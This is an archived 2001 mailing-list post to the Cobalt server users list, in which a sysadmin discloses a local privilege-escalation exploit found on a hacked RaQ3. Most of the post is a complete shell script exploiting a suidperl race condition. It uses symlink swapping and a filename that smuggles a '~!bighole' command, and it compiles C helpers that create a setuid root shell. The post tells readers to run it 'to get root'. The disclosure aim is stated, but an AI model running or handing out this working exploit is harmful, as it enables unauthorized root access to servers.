[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] suid perl - 2 month old hazard

Subject: [cobalt-users] suid perl - 2 month old hazard
From: "Arsalan Mahmud" <arsalan@xxxxxxxxxxxx>
Date: Tue Nov 13 08:13:00 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Hi,
  Well I have been sitting on this for over a month now since we found it on one of our hacked raq3's (thank god it was not wiped out or 
tampered with), it works on all the raq3's we had and i guess this is the best way to get a patch out since upgrading the perl version just 
makes a mess of the cobalt frontend and a mail to cobalt dident get any responces for over 3 weeks now and not to forget, if it upgeade 
the server software from the comand prompt, the warenty goes viod..... 


save as "xperl.sh" and run with "perl xperl.sh" from a command prompt to get root..
------------ start -----------------------------
#!/bin/sh
# $Id: my-xperl.sh,v 1.1 2000/09/02 13:56:28 erzr Exp $

SUIDPERL=/usr/bin/suidperl
SUIDBIN=/usr/bin/passwd
if [ ! -u $SUIDPERL ]; then
  echo "Sorry, $SUIDPERL4 is NOT setuid or does not exist"
  exit 0
fi
if [ ! -u $SUIDBIN ]; then
  echo "Sorry, $SUIDBIN is NOT setuid or does not exist"
  exit 0
fi

cat >flare <<__eof__
#!/usr/bin/suidperl
print "Nothing can stop me now...\n";
__eof__

cat >bighole.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  chown("sush",0,0);
  chmod("sush",04755);
}
__eof__

cat >sush.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  system("/bin/bash");
}
__eof__

make bighole sush

if [ ! -x ./sush ]; then
  echo "Oops, seems to me I cannot compile helper applications."
fi

chmod 4755 ./flare

FILENAME='none
~!bighole

'
export interactive=1
PATH=.:$PATH

echo "waiting for our shell... It  could take up to 5 minutes."
while :; do
  ( ln -f -s $SUIDBIN "$FILENAME";usleep $RANDOM; nice -n +20 $SUIDPERL ./"$FILE
NAME" <./flare & ) &>/dev/null &
  ( usleep $RANDOM ; ln -f -s /dev/stdin "$FILENAME" ) &>/dev/null &
  if [ -u ./sush ]; then
    echo "VOILA, BABE :-) Entering rootshell..."
    rm -f "$FILENAME" sush.c bighole bighole.c flare
    ./sush
    echo "cleaning up."
    rm -f "$FILENAME" sush.c bighole bighole.c flare sush
    exit 0
  fi
done

--------- END ---------

If you think i was wrong of me to send this ...  well if our security can be compromised, it can be yours...

bravo to cobalt on their excelet "apliances"

-- 
Arsalan Mahmud
Nexus Technologies
http://www.nexus.net.pk

Follow-Ups:
- Re: [cobalt-users] suid perl - 2 month old hazard
  - From: flash22

Prev by Date: [cobalt-users] Re: [Cobalt Users] Help!!! Qube 3
Next by Date: [cobalt-users] RaQ2 emergency help
Previous by thread: Re: [cobalt-users] Re: [Cobalt Users] Help!!! Qube 3
Next by thread: Re: [cobalt-users] suid perl - 2 month old hazard

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index